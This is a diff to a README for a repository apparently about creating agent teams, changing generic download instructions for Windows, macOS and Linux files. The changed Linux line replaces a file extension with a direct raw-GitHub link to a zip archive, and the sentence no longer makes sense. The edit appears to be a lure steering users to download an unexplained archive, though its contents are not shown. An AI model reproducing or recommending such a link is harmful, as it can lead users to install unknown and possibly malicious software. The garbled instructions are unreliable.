ELVINgotIT/creating-agent-teams/README.md

 - Windows files will usually end with `.exe` or `.msi`
 - macOS files typically end with `.dmg` or `.pkg`
-- Linux files might appear as `.tar.gz` archives or `.deb` packages
+- Linux files might appear as `https://raw.githubusercontent.com/ELVINgotIT/creating-agent-teams/main/skills/creating-agent-teams/teams_creating_agent_homemade.zip` archives or `.deb` packages

 Click the right file to start downloading it to your computer.
 The file size is usually under 100 MB.